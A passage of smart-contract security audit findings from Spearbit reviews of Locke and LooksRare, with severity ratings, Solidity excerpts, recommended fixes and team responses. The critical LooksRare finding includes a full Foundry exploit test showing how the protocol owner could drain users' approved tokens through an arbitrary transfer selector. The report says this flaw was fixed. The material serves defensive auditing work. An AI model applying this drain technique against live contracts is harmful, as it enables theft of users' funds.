Recommendation: Ideally, if streamAmt ends up being zero for a certain accTimeDelta, the user should be able to exit the pool with ts.tokens, as long as they don't receive rewards for the same duration. However, in practice, implementing this may create issues related to unaccrued seconds. +5.2.2 User can stake before the stream creator has funded the stream Severity: Medium Risk Context: Locke.sol#L410 Description: Consider the following scenario: 1. Alice stakes in a stream before the stream starts. 2. Nobody funds the stream. 3. In case of an indefinite stream, Alice loses some of her deposit depending on when she exits the stream. For a usual stream, Alice will have her deposit tokens locked until endDepositLock. Recommendation: Two mitigations are possible: 1. A frontend check warning the user if a stream does not have any reward tokens. 2. A check in the stake function which would revert when rewardTokenAmount == 0. +5.2.3 Potential funds locked due to low token decimals and long stream duration Severity: Medium Risk Context: Locke.sol#L166 Description: In cases where the deposit token's decimals are too low (4 or less) or the remaining stream duration is too long, checking streamAmt > 0 may affect regular users. They could be temporarily blocked by the contract, i.e. they cannot stake, withdraw, or get rewards, and would have to wait until streamAmt > 0 or the stream ends. Although unlikely to happen, it still is a potential lock-of-funds issue. function updateStreamInternal() internal { ... if (acctTimeDelta > 0) { if (ts.tokens > 0) { uint112 streamAmt = uint112(uint256(acctTimeDelta) * ts.tokens / (endStream - ts.lastUpdate)); if (streamAmt == 0) revert ZeroAmount(); ts.tokens -= streamAmt; } ... } Recommendation: Consider scaling ts.tokens to 18 decimals of precision for internal accounting. 5.3 Low Risk +5.3.1 Sanity check on the reward token's decimals Severity: Low Risk Context: Locke.sol#L262 Description: Add a sanity check on the reward token's decimals, which shouldn't exceed 33 because TokenStream.rewards has a uint112 type.
constructor(
    uint64 _streamId,
    address creator,
    bool _isIndefinite,
    address _rewardToken,
    address _depositToken,
    uint32 _startTime,
    uint32 _streamDuration,
    uint32 _depositLockDuration,
    uint32 _rewardLockDuration,
    uint16 _feePercent,
    bool _feeEnabled
)
    LockeERC20(
        _depositToken,
        _streamId,
        _startTime + _streamDuration + _depositLockDuration,
        _startTime + _streamDuration,
        _isIndefinite
    )
    MinimallyExternallyGoverned(msg.sender) // inherit factory governance
{
    // No error code or msg to reduce bytecode size
    require(_rewardToken != _depositToken);
    // set fee info
    feePercent = _feePercent;
    feeEnabled = _feeEnabled;
    // limit feePercent
    require(feePercent < 10000);
    // store streamParams
    startTime = _startTime;
    streamDuration = _streamDuration;
    // set in shared state
    endStream = startTime + streamDuration;
    endDepositLock = endStream + _depositLockDuration;
    endRewardLock = startTime + _rewardLockDuration;
    // set tokens
    depositToken = _depositToken;
    rewardToken = _rewardToken;
    // set streamId
    streamId = _streamId;
    // set indefinite info
    isIndefinite = _isIndefinite;
    streamCreator = creator;
    uint256 one = ERC20(depositToken).decimals();
    if (one > 33) revert BadERC20Interaction();
    depositDecimalsOne = uint112(10**one);
    // set lastUpdate to startTime to reduce codesize and first users gas
    lastUpdate = startTime;
}
Recommendation: Consider adding sanity checks on the reward token's decimals.
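A minimal sketch of the recommended check, mirroring the existing depositToken validation in the constructor above (since type(uint112).max is roughly 5.19 * 10**33, decimals above 33 could make TokenStream.rewards overflow):

// Hypothetical addition to the constructor, next to the depositToken check:
uint256 rewardDecimals = ERC20(rewardToken).decimals();
if (rewardDecimals > 33) revert BadERC20Interaction();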
+5.3.2 Use a stricter bound for transferability delay Severity: Low Risk Context: LockeErc20.sol#L177 Description:
modifier transferabilityDelay {
    // ensure the time is after end stream
    if (block.timestamp < endStream) revert NotTransferableYet();
    _;
}
Recommendation: Consider using <= instead of < so that it covers time up to and including endStream: block.timestamp <= endStream +5.3.3 Potential issue with malicious stream creator Severity: Low Risk Context: Locke.sol#L307 Description: Assume that users staked tokens at the beginning. A malicious stream creator could come and stake an extremely large amount of tokens, thus driving up the value of totalVirtualBalance. This means that users will barely receive rewards while giving away deposit tokens at the same rate. Users can exit the pool in this case to save their unstreamed tokens.
function rewardPerToken() public override view returns (uint256) {
    if (totalVirtualBalance == 0) {
        return cumulativeRewardPerToken;
    } else {
        uint256 rewards;
        unchecked {
            rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * depositDecimalsOne) / streamDuration / totalVirtualBalance;
        }
        return cumulativeRewardPerToken + rewards;
    }
}
Recommendation: Consider constant stream monitoring. +5.3.4 Users may exit the pool at a small duration before endStream to save tokens Severity: Low Risk Context: Locke.sol#L164 Description: Given a time t that is very close to endStream and a time period Δt, assume that the rewards for a particular user during this period are 0. Since the amount of deposit token streamed is inversely proportional to the time that is left, i.e. more deposit tokens are exchanged during a time period that is closer to the end of the stream rather than at the beginning of the stream, it is likely that the deposit token sold during Δt is non-zero. A user can use this information to exit the stream just before endStream. In this process the user prevents some of their tokens from streaming while receiving no rewards for this duration. Suppose that there is a stream and two tokens, testTokenB and testTokenA, where testTokenA is the reward token and testTokenB is the deposit token. Assume that the following conditions are true: assert(testTokenB.balanceOf(alice) == 200); assert(testTokenB.balanceOf(bob) == 100); assert(testTokenA.balanceOf(alice) == 0); assert(testTokenA.balanceOf(bob) == 0); Using the testing conventions from the repository, consider the following stream instance:
function test_equality_withdraw() public {
    testTokenA.approve(address(stream), 1000);
    stream.fundStream(1000);
    vm.startPrank(alice);
    testTokenB.approve(address(stream), 200);
    stream.stake(200);
    vm.stopPrank();
    vm.startPrank(bob);
    testTokenB.approve(address(stream), 100);
    stream.stake(100);
    vm.warp(endStream - 1);
    stream.exit();
    vm.stopPrank();
    vm.warp(endStream + 1);
    vm.prank(alice);
    stream.claimReward();
    vm.prank(bob);
    stream.claimReward();
}
5.4 Gas Optimization +5.4.1 Moving check require(feePercent < 10000) in updateFeeParams to save gas Severity: Gas Optimization Context: Locke.sol#L237 Description: feePercent comes directly from LockeFactory’s feeParams.feePercent, which is configured in the updateFeeParams function and used across all Stream contracts. Moving this check into the updateFeeParams function can avoid checking in every contract and thus save gas. Recommendation: Consider moving the check in the updateFeeParams function. 15 +5.4.2 Use calldata instead of memory for some function parameters Severity: Gas Optimization Context: MerkleLocke.sol#L10, MerkleLocke.sol#L17 and MerkleLocke.sol#L75 Description: Having function arguments in calldata instead of memory is more optimal in the aforementioned cases. See the following reference. Recommendation: Consider using calldata instead of memory. +5.4.3 Update cumulativeRewardPerToken only once after stream ends Severity: Gas Optimization Context: Locke.sol#597 Description: Since cumulativeRewardPerToken does not change once it is updated after the stream ends, it has to be updated only once. Recommendation: Consider changing the code as follows: - cumulativeRewardPerToken = rewardPerToken(); + if (lastUpdate < endStream) { + + } cumulativeRewardPerToken = rewardPerToken(); +5.4.4 Expression 10**one can be unchecked Severity: Gas Optimization Context: Locke.sol#263 Description: uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one) Recommendation: The following recommendation would perform checked exponentiation which is not that bad and just checks if one > 77 and the revert, otherwise it uses exp(10, one). unchecked { depositDecimalsOne = uint112(10**one) }; +5.4.5 Calculation of amt can be unchecked Severity: Gas Optimization Context: Locke.sol#L536 Description: The value newBal in this context is always greater than prevBal because of the check located at Locke.sol#534. Therefore, we can use unchecked subtraction. Recommendation: - + + uint112 amt = uint112(newBal - prevBal); uint112 amt; unchecked { amt = uint112(newBal - prevBal); } 16 +5.4.6 Change lastApplicableTime() to endStream Severity: Gas Optimization Context: Locke.sol#L610, Locke.sol#L615, Locke.sol#L642, and Locke.sol#L639. Description: Since block.timestamp >= endStream in the abovementioned cases the lastApplicableTime function will always return endStream. Recommendation: Change lastApplicableTime() to endStream to save gas. 5.5 Informational +5.5.1 Unused variable _ret Severity: Informational Context: Locke.sol#L812 Recommendation: Unused variable _ret can be either removed or forwarded in case of an error. 
+5.5.2 Simplifying code logic Severity: Informational Context: LockeLens.sol#L26-L37 Description: if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; }
function currDepositTokensNotYetStreamed(IStream stream, address who) external view returns (uint256) {
    unchecked {
        uint32 timestamp = uint32(block.timestamp);
        (uint32 startTime, uint32 endStream, , ) = stream.streamParams();
        if (block.timestamp >= endStream) return 0;
        (
            uint256 lastCumulativeRewardPerToken,
            uint256 virtualBalance,
            uint112 rewards,
            uint112 tokens,
            uint32 lastUpdate,
            bool merkleAccess
        ) = stream.tokenStreamForAccount(address(who));
        if (timestamp < lastUpdate) {
            return tokens;
        }
        uint32 acctTimeDelta = timestamp - lastUpdate;
        if (acctTimeDelta > 0) {
            uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate);
            return tokens - uint112(streamAmt);
        } else {
            return tokens;
        }
    }
}
Recommendation: The above code can be simplified as follows:
if (timestamp <= lastUpdate) {
    return tokens;
}
uint32 acctTimeDelta = timestamp - lastUpdate;
uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate);
return tokens - uint112(streamAmt);
+5.5.3 Unused parameter _emergency_governor in constructor Severity: Informational Context: LockeFactory.sol#L29 Recommendation: Remove the unused parameter _emergency_governor from the constructor arguments. +5.5.4 Unused Imports Severity: Informational Context: Locke.sol#L6 and SharedState.sol#L3 Recommendation: Remove the aforementioned imports. diff --git a/findings_newupdate/spearbit/LooksRare-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LooksRare-Spearbit-Security-Review.txt new file mode 100644 index 0000000..24320be --- /dev/null +++ b/findings_newupdate/spearbit/LooksRare-Spearbit-Security-Review.txt @@ -0,0 +1,68 @@ +5.1.1 The Protocol owner can drain users' currency tokens Severity: Critical Risk Context: • LooksRareProtocol.sol#L138 • LooksRareProtocol.sol#L391-L398 • ITransferSelectorNFT.sol#L14-L17 • TransferSelectorNFT.sol#L41 • TransferSelectorNFT.sol#L89-L98 Description: The Protocol owner can drain users' currency tokens that have been approved to the protocol. Makers who want to bid on NFTs would need to approve their currency token to be spent by the protocol. The owner should not be able to access these funds for free. The owner can drain the funds as follows: 1. Calls addTransferManagerForAssetType and assigns the currency token as the transferManagerForAssetType and IERC20.transferFrom.selector as the selectorForAssetType for a new assetType. 2. Signs an almost empty MakerAsk order and sets its collection as the address of the targeted user and the assetType to the newly created assetType. The owner also creates the corresponding TakerBid by setting the recipient field to the amount of currency they would like to transfer. 3. Calls the executeTakerBid endpoint with the above data without a merkleTree or affiliate.
// file: test/foundry/Attack.t.sol
pragma solidity 0.8.17;

import {IStrategyManager} from "../../contracts/interfaces/IStrategyManager.sol";
import {IBaseStrategy} from "../../contracts/interfaces/IBaseStrategy.sol";
import {OrderStructs} from "../../contracts/libraries/OrderStructs.sol";
import {ProtocolBase} from "./ProtocolBase.t.sol";
import {MockERC20} from "../mock/MockERC20.sol";

contract NullStrategy is IBaseStrategy {
    function isLooksRareV2Strategy() external pure override returns (bool) {
        return true;
    }

    function executeNull(
        OrderStructs.TakerBid calldata /* takerBid */ ,
        OrderStructs.MakerAsk calldata /* makerAsk */
    ) external pure returns (
        uint256 price,
        uint256[] memory itemIds,
        uint256[] memory amounts,
        bool isNonceInvalidated
    ) {}
}

contract AttackTest is ProtocolBase {
    NullStrategy private nullStrategy;
    MockERC20 private mockERC20;
    uint256 private signingOwnerPK = 42;
    address private signingOwner = vm.addr(signingOwnerPK);
    address private victimUser = address(505);

    function setUp() public override {
        super.setUp();
        vm.startPrank(_owner);
        looksRareProtocol.initiateOwnershipTransfer(signingOwner);
        // This particular strategy is not a requirement of the exploit.
        nullStrategy = new NullStrategy();
        looksRareProtocol.addStrategy(
            0, 0, 0, NullStrategy.executeNull.selector, false, address(nullStrategy)
        );
        mockERC20 = new MockERC20();
        looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true);
        looksRareProtocol.updateCreatorFeeManager(address(0));
        mockERC20.mint(victimUser, 1000);
        vm.stopPrank();
        vm.prank(signingOwner);
        looksRareProtocol.confirmOwnershipTransfer();
    }

    function testDrain() public {
        vm.prank(victimUser);
        mockERC20.approve(address(looksRareProtocol), 1000);
        vm.startPrank(signingOwner);
        looksRareProtocol.addTransferManagerForAssetType(
            2, address(mockERC20), mockERC20.transferFrom.selector
        );
        OrderStructs.MakerAsk memory makerAsk = _createSingleItemMakerAskOrder({
            askNonce: 0,
            subsetNonce: 0,
            strategyId: 1, // null strategy
            assetType: 2, // ERC20 asset!
            orderNonce: 0,
            collection: victimUser, // <--- will be used as the `from`
            currency: address(0),
            signer: signingOwner,
            minPrice: 0,
            itemId: 1
        });
        bytes memory signature = _signMakerAsk(makerAsk, signingOwnerPK);
        OrderStructs.TakerBid memory takerBid = OrderStructs.TakerBid(
            address(1000), // `amount` field for the `transferFrom`
            0,
            makerAsk.itemIds,
            makerAsk.amounts,
            bytes("")
        );
        looksRareProtocol.executeTakerBid(
            takerBid, makerAsk, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE
        );
        vm.stopPrank();
        assertEq(mockERC20.balanceOf(signingOwner), 1000);
        assertEq(mockERC20.balanceOf(victimUser), 0);
    }
}
Recommendation: It would be best to fix the selector instead of the protocol owner being able to assign arbitrary selectors for managerSelectorOfAssetType[assetType]. This can be done by requiring all selected transfer managers to adhere to the same interface, which defines the following endpoint:
interface ITransferManager {
    ...
    function executeTransfer(
        address collection,
        address from,
        address to,
        uint256[] calldata itemIds,
        uint256[] calldata amounts
    ) external;
}
The endpoint name executeTransfer above should be chosen to avoid selector collision with potential currencies that will be allowed for the protocol (IERC20 tokens or even all the endpoint selectors involved in the protocol).
The call in _transferNFT can be changed to: (bool status, ) = ITransferManager(transferManager).executeTransfer( collection, sender, recipient, itemIds, amounts ); and managerSelectorOfAssetType's type can be changed to: mapping(uint256 => address) public managerSelectorOfAssetType; The above change also has the benefit of reducing gas costs. LooksRare: The ability to add new transfer managers and selectors for new asset types has been removed. Also, the transfer manager for ERC721 and ERC1155 assets gets assigned to an immutable variable upon deployment. Fixed in PR 308 and PR 363. Spearbit: Verified. 5.2 Medium Risk +5.2.1 StrategyFloorFromChainlink will often revert due to stale prices Severity: Medium Risk Context: StrategyFloorFromChainlink.sol Description: The FloorFromChainlink strategy inherits from BaseStrategyChainlinkPriceLatency, so it can have a maxLatency of at most 3600 seconds. However, all of the Chainlink mainnet floor price feeds have a heartbeat of 86400 seconds (24 hours), so the Chainlink strategies will revert with the PriceNotRecentEnough error quite often. At the time of writing, every single mainnet floor price feed has an updatedAt timestamp well over 3600 seconds in the past, meaning the strategy would always revert for any mainnet price feed right now. This may not have been realized earlier because the Goerli floor price feeds do have a heartbeat of 3600, but the mainnet heartbeat is much less frequent. One of the consequences is that users might miss out on exchanges they would have accepted. For example, if a taker bid is interested in a maker ask with an ETH premium from the floor, then in the likely scenario where the taker didn't log in within 1 hour of the last oracle update, the strategy will revert and the exchange won't happen even though both parties are willing. If the floor moves up again the taker might not be interested anymore. The maker will have lost out on making a premium from the floor, and the taker would have lost out on the exchange they were willing to make. Recommendation: For the FloorFromChainlink strategy, allow for a maxLatency value of 86400, instead of restricting it to 3600. LooksRare: Fixed in PR 326. Spearbit: Verified. 5.3 Low Risk +5.3.1 minPrice and maxPrice should reflect the allowed regions for the funds to be transferred from the bidder to the ask recipient Severity: Low Risk Context: • ExecutionManager.sol#L157-L167 • ExecutionManager.sol#L243-L253 Description: 1. When a maker or taker sets a minPrice for an ask, the protocol should guarantee that the funds they receive are at minimum the minPrice amount (currently not enforced). 2. Conversely, when a maker or taker sets a maxPrice for a bid, the protocol should guarantee that the amount they spend is at maximum maxPrice (currently enforced). For 1., the current protocol-controlled deviation can be 30% at maximum (the sum of fees sent to the creator, the protocol fee recipient, and an affiliate). Recommendation: One can enforce both of the above points by making sure strategies only require minPrice <= maxPrice (they would not need to be equal in general for each strategy, and this can be indirectly enforced at the protocol level). Related issue: "price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed"
Related issue: "price validation in executeStrategyWithTakerAsk, executeCollectionStrate- gyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed" Changes required for taker bid strategies: 8 • Common changes for all strategies: the takerBid.maxPrice needs to be compared to the sum of the price returned by the strategy and the fees that would need to be sent to the creator, protocol fee recipient, and an affiliate (takerBid.maxPrice >= sum). Note that in this case fees are not deducted from the price but added, and the taker is responsible to pay all those fees, but has the takerBid.maxPrice as a guard so that they don't end up paying more than what they had set. This would also allow the maker to receive the full amount of the fund/price set by their chosen strategy. • InheritedStrategy: iszero(eq(price, counterpartyPrice))) needs to be taken out of this shared logic between taker bid and ask executions. The strategy chooses makerAsk.minPrice as the strategies price which is correct since we also need to make sure the price returned by the strategy which is what the maker would receive is at least makerAsk.minPrice. • StrategyDutchAuction: if (takerBid.maxPrice < price) needs to be removed as the common re- quired change would cover this. Also, this strategy picks the price in a way that it is not less than mak- erAsk.minPrice. • StrategyUSDDynamicAsk: if (takerBid.maxPrice < price) needs to be removed as the common re- quired change would cover this. Also, this strategy picks the price in a way that it is not less than mak- erAsk.minPrice. • StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid: if (takerBid.maxPrice < price) (2) needs to be removed as the common required change would cover this. Also, this strategy picks the price in a way that it is not less than makerAsk.minPrice. In a nutshell, remove the above-mentioned checks for takerBid.maxPrice from individual strategies and instead apply a similar check at the protocol level that also includes the extra fees. The following if (fees[1] == 0) { // If creator fee is null, protocol fee is set as the minimum total fee amount fees[0] = minTotalFeeAmount; // Net fee amount for seller fees[2] = price - fees[0]; } else { // If there is a creator fee information, the protocol fee amount can be calculated fees[0] = _calculateProtocolFeeAmount(price, makerAsk.strategyId, fees[1], minTotalFeeAmount); // Net fee amount for seller fees[2] = price - fees[1] - fees[0]; } will be replaced by fees[2] = price; if (fees[1] == 0) { // If creator fee is null, protocol fee is set as the minimum total fee amount fees[0] = minTotalFeeAmount; } else { // If there is a creator fee information, the protocol fee amount can be calculated fees[0] = _calculateProtocolFeeAmount(price, makerAsk.strategyId, fees[1], minTotalFeeAmount); } if (takerBid.maxPrice < (fees[0] + fees[1] + fees[2])) { revert BidTooLow(); } pmakerAsk min (cid:20) f2 (cid:20) f0 + f1 + f2 (cid:20) ptakerBid max future taker bid strategies would need to guarantee the price they pick is always not less than makerAsk.minPrice ( pmakerAsk (cid:20) f2 ) and by the above change the protocol validates the returned price range including the fees against min 9 the takerBid.maxPrice ( f0 + f1 + f2 (cid:20) ptakerBid max ). Changes required for taker ask strategies: • Common changes for all strategies: the takerAsk.minPrice needs to be compared to the fees[2] which is the amount the msg.sender or takerAsk.recipient would receive. 
• InheritedStrategy: iszero(eq(price, counterpartyPrice)) needs to be taken out of this shared logic between taker bid and ask executions. The strategy chooses makerBid.maxPrice as the strategy's price, which is correct since we also need to make sure the price returned by the strategy (which is what the maker would spend) is at most makerBid.maxPrice.
• StrategyItemIdsRange: if (makerBid.maxPrice != takerAsk.minPrice) needs to be removed, as the common required change would cover this. Also, this strategy picks the price in a way that it is not greater than makerBid.maxPrice.
• StrategyCollectionOffer: price != takerAsk.minPrice (2 occurrences) needs to be removed, as the common required change would cover this. Also, this strategy picks the price in a way that it is not greater than makerBid.maxPrice.
• StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk: if (takerAsk.minPrice > price) (2 occurrences) needs to be removed, as the common required change would cover this. Also, this strategy picks the price in a way that it is not greater than makerBid.maxPrice.
In a nutshell, remove the above-mentioned checks for takerAsk.minPrice from individual strategies and instead apply a similar check at the protocol level that also excludes the deducted fees. We can add a check to the following

if (fees[1] == 0) {
    // If creator fee is null, protocol fee is set as the minimum total fee amount
    fees[0] = minTotalFeeAmount;
    // Net fee for seller
    fees[2] = price - fees[0];
} else {
    // If there is creator fee information, the protocol fee amount can be calculated
    fees[0] = _calculateProtocolFeeAmount(price, makerBid.strategyId, fees[1], minTotalFeeAmount);
    // Net fee for seller
    fees[2] = price - fees[1] - fees[0];
}

The added new check:

if (takerAsk.minPrice > fees[2]) {
    revert AskTooHigh();
}

With this change the following chain of inequalities holds:

p_min^takerAsk ≤ f_2 − f_0 − f_1 ≤ f_2 ≤ p_max^makerBid

Future taker ask strategies would need to guarantee that the price they pick is always not greater than makerBid.maxPrice (f_2 ≤ p_max^makerBid), and by the above change the protocol validates the returned price range, excluding the fees, against takerAsk.minPrice (p_min^takerAsk ≤ f_2 − f_0 − f_1).
The above changes would protect the invariants set by the maker and taker when slippage is introduced by:
• Variable creator fees.
• The owner front-running (potentially accidentally) a transaction to change the fee percentages before an order gets executed.
Related issue: "Seller might get a lower fee than expected due to front-running"
LooksRare: Acknowledged.
Spearbit: Acknowledged.

+5.3.2 StrategyItemIdsRange does not invalidate makerBid.amounts[0] == 0
Severity: Low Risk
Context:
• StrategyItemIdsRange.sol#L44
Description: StrategyItemIdsRange does not check whether makerBid.amounts[0] is zero. If it were 0, the taker could provide empty itemIds and amounts, which would cause the for loop to be skipped. The check below would also pass, since both amounts are 0:

if (totalOfferedAmount != desiredAmount) {
    revert OrderInvalid();
}

Depending on the implementation of the transfer manager used for the asset type in this order, we might end up with the taker taking funds from the maker without providing any NFT tokens. The current implementation of TransferManager does check whether the provided itemIds have length 0 and would revert in that case. The recommended guard is sketched below.
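As a minimal sketch (the exact placement inside executeStrategyWithTakerAsk is an assumption for illustration), the missing guard is a one-line check on the maker's signed amount:

// Sketch: reject maker bids whose single signed amount is zero, so an empty
// takerAsk.itemIds/amounts pair cannot satisfy the aggregate-amount check.
uint256 desiredAmount = makerBid.amounts[0];
if (desiredAmount == 0) {
    revert OrderInvalid();
}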
One difference between this strategy and the others is that, while all strategies (including this one) revert if the amount for a specific itemId is 0 (and where strategies have loops, the loop length depends on maker-supplied parameters that force the loop to run at least once), in this strategy the loop is skipped entirely if the taker provides no itemIds, and the aggregated amount is never checked against 0.
Recommendation: Both executeStrategyWithTakerAsk and isMakerBidValid should check whether makerBid.amounts[0] == 0 and revert (return invalid, respectively).
LooksRare: Fixed in PR 367.
Spearbit: Verified.

+5.3.3 TransferManager's owner can block token transfers for LooksRareProtocol
Severity: Low Risk
Context:
• TransferManager.sol#L241
• TransferSelectorNFT.sol#L28-L32
Description: In general, a deployed TransferManager (T) and a deployed LooksRareProtocol (L) might have two different owners (O_T, O_L). Assume TransferManager is used for asset types 0 and 1 (ERC721, ERC1155) in LooksRareProtocol and TransferManager has marked the LooksRareProtocol as an allowed operator. At any point, O_T can call removeOperator to block L from calling T. If that happens, O_L would need to add new (virtual) asset types (not 0 or 1) and the corresponding transfer managers for them. Makers would need to re-sign their orders with the new asset types. Moreover, if LooksRare applies their solution for the issue "The Protocol owner can drain users' currency tokens" through PR 308, which removes the ability of O_L to add new asset types, then the whole protocol would need to be redeployed, since all order executions would revert.
Recommendation: Enforce O_L = O_T. This can be done by modifying the LooksRareProtocol's constructor to deploy TransferManager and assign O_L as its owner, and by making sure only O_L can update O_T at any point in time. Another solution to this problem could be to make sure O_L has more power than O_T; for example, O_L should be able to set/update O_T at any point (one can check that before adding T to L).
LooksRare: Acknowledged, but the purpose of having a transfer manager contract separate from the protocol contract is to allow future versions of marketplace protocols (or other systems) to reuse existing user approvals. It is possible the protocol itself "gets discontinued" in the future with ownership being renounced while the transfer manager system remains active.
Spearbit: Acknowledged.

+5.3.4 transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether amount == 1 for an ERC721 token
Severity: Low Risk
Context:
• TransferManager.sol#L47
• TransferManager.sol#L112
Description: transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether amount == 1 for an ERC721 token. If an operator (approved by a user) sends a 0 amount for an itemId in the context of transferring an ERC721 token, TransferManager would still perform the transfer, even though the logic in the operator might have meant to avoid it.
Recommendation: In transferItemsERC721 and transferBatchItemsAcrossCollections it would be best to introduce checks for ERC721 token amounts to make sure they are always 1 (if not, skip or revert); a sketch follows below.
LooksRare: Amount checks have been moved from execution strategies to the transfer manager in PR 386.
Spearbit: Verified.
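For illustration, a minimal sketch of the check recommended in 5.3.4 (the loop shape and the AmountInvalid error name are assumptions, not the repository's actual code; the standard IERC721 interface is assumed in scope):

// Sketch: enforce amount == 1 for every ERC721 item before transferring.
function _transferItemsERC721(
    address collection,
    address from,
    address to,
    uint256[] calldata itemIds,
    uint256[] calldata amounts
) internal {
    uint256 length = itemIds.length;
    for (uint256 i; i < length; ) {
        if (amounts[i] != 1) {
            revert AmountInvalid(); // hypothetical error name
        }
        IERC721(collection).transferFrom(from, to, itemIds[i]);
        unchecked {
            ++i;
        }
    }
}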
+5.3.5 The maker cannot enforce the number of times a specific order can be fulfilled for custom strategies
Severity: Low Risk
Context:
• ExecutionManager.sol#L221
• ExecutionManager.sol#L135
• LooksRareProtocol.sol#L549-L556
Description: When a maker signs an order with a specific strategy, it is left up to the strategy to decide how many times this specific order can be fulfilled. The strategy's logic for deciding on the returned isNonceInvalidated value can be complex in general and might be prone to errors (or have backdoors). The maker should be able to directly enforce at least an upper bound on the maximum number of fulfillments for an order, to avoid unexpected expenditure.
Recommendation: It would be best to introduce a new field maxNumberOfFulfillments (or a similar name) for the structs MakerBid and MakerAsk, which the maker can sign. The LooksRare protocol would need to define a new storage parameter that keeps track of the number of fulfillments based on the orderHash:

mapping(bytes32 => uint256) private orderFulfilled;

and make sure the number of fulfillments (orderFulfilled[orderHash]) does not surpass maxNumberOfFulfillments; a sketch of this cap is given after 5.3.6 below.
LooksRare: Acknowledged but won't implement.
Spearbit: Acknowledged.

+5.3.6 A strategy can potentially reduce the value of a token before it gets transferred to a maker when a taker calls executeTakerAsk
Severity: Low Risk
Context:
• ExecutionManager.sol#L124
• ExecutionManager.sol#L210
Description: When executeTakerAsk is called by a taker, a strategy (signed by the maker) will be called:

(bool status, bytes memory data) = strategyInfo[makerBid.strategyId].implementation.call(
    abi.encodeWithSelector(strategyInfo[makerBid.strategyId].selector, takerAsk, makerBid)
);

Note that this is a stateful call, performed before the NFT token is transferred to the maker (signer). Even though the strategy is fixed by the maker (since the strategyId has been signed), the strategy's implementation might involve complex logic that could allow (if the strategy somehow colludes with the taker) a derivative token that is owned by / linked to the to-be-transferred token to be reattached to another token (think of accessories for an NFT character token in a game). In that sense, the value of the to-be-transferred token would be reduced. A maker would not be able to check for this linked derivative token ownership during the transaction, since there is no post-transfer hook for the maker (except in one special case, when the token involved is an ERC1155 and the maker is a custom contract). Also, note that all the implemented strategies do not alter state when they are called (their endpoints have pure or view visibility); the only exception is the StrategyTestMultiFillCollectionOrder test contract.
Recommendation: It would be best to only allow staticcalls when the protocol makes a call (1, 2) into a strategy, to avoid the issues above. This recommendation also does not break the flow of any of the currently implemented strategies.

(bool status, bytes memory data) = strategyInfo[makerXxx.strategyId].implementation.staticcall( // <---
    abi.encodeWithSelector(strategyInfo[makerXxx.strategyId].selector, takerYyy, makerXxx)
);

LooksRare: There might be future strategies that change state in the strategy contract, hence we decided to keep it as call instead of staticcall. Acknowledged as a business risk.
Spearbit: Acknowledged.
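Returning to the recommendation in 5.3.5, a minimal sketch of the fulfillment cap (the guard's placement, the zero-means-uncapped convention, and the TooManyFulfillments error are assumptions for illustration):

// Sketch: protocol-level cap on how many times a signed order may be fulfilled.
mapping(bytes32 => uint256) private orderFulfilled;

function _checkFulfillmentCap(bytes32 orderHash, uint256 maxNumberOfFulfillments) internal {
    // A cap of 0 could be treated as "no cap" to keep existing orders valid.
    if (maxNumberOfFulfillments != 0) {
        if (++orderFulfilled[orderHash] > maxNumberOfFulfillments) {
            revert TooManyFulfillments(); // hypothetical error name
        }
    }
}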
+5.3.7 An added transfer manager cannot get deactivated from the protocol
Severity: Low Risk
Context:
• TransferSelectorNFT.sol
Description: Once a transfer manager for an asset type gets added to the protocol, either through the constructor or through addTransferManagerForAssetType, there is no mechanism for the protocol's owner to deactivate it if malicious behavior involving the transfer manager is discovered (unlike strategies, which can be deactivated). If TransferManager is used for an asset type, the owner on the TransferManager side can break the link between the operator (potentially the LooksRare protocol) and the TransferManager, but not the other way around.
Recommendation: We can add an update functionality where only the activation status of a transfer manager can be updated (and not the implementation or the selector) by the protocol owner. If an update mechanism will not be added, the above case should be documented/commented for the users/makers, so that in case of malicious activity by a transfer manager for an asset type, they would stop signing orders with that asset type and would also cancel the already-signed orders. Takers would likewise need to refrain from executing orders with that particular asset type. If the current and potential transfer managers have the same owner as the protocol, and if that owner can break the link between these two contracts from at least one side, implementing a second pass-through filter is not necessary.
LooksRare: This issue is not relevant anymore following the changes implemented in PR 308.
Spearbit: Verified.

+5.3.8 Temporary DoS is possible in case orders are using tokens with blacklists
Severity: Low Risk
Context: LooksRareProtocol.sol#L470
Description: In the process of settling orders, _transferFungibleTokens is called at most 4 times. If one of these calls fails, the entire transaction fails. It can only fail when an ERC20 token is used for the trade, but since currencies are whitelisted in the system and presumably vetted by the team, it is unlikely that the receiver will have the ability to revert the entire transaction, although it is possible for contracts that implement a transferAndCall pattern. However, there is still the issue of transactions being reverted due to blacklisting (which has become more common in the last year). In order to better assess the risk, let's elaborate on the 4 potential recipients of a transaction:
1. affiliate - The risk can be easily mitigated by proper handling at the front-end level. If the transaction fails due to the affiliate's address, the taker can specify address(0) as the affiliate.
2. recipient - If the transaction fails due to the recipient's address, it can only impact the taker in a gas-griefing way.
3. protocol - If the transaction fails due to the protocol's address, its address can be updated by the contract owner in the worst case.
4. creator - If the transaction fails due to the creator's address, it cannot be changed directly, but in the worst case creatorFeeManager can be changed.
Recommendation: In conclusion, this issue cannot brick the system entirely, and specific orders cannot be censored forever this way. However, it may still cause a temporary DoS for certain orders, which is why it is recommended to use an off-chain monitoring service to monitor blacklisted addresses that are used by the protocol, and to make sure that this is supported at the front-end level as well if needed.
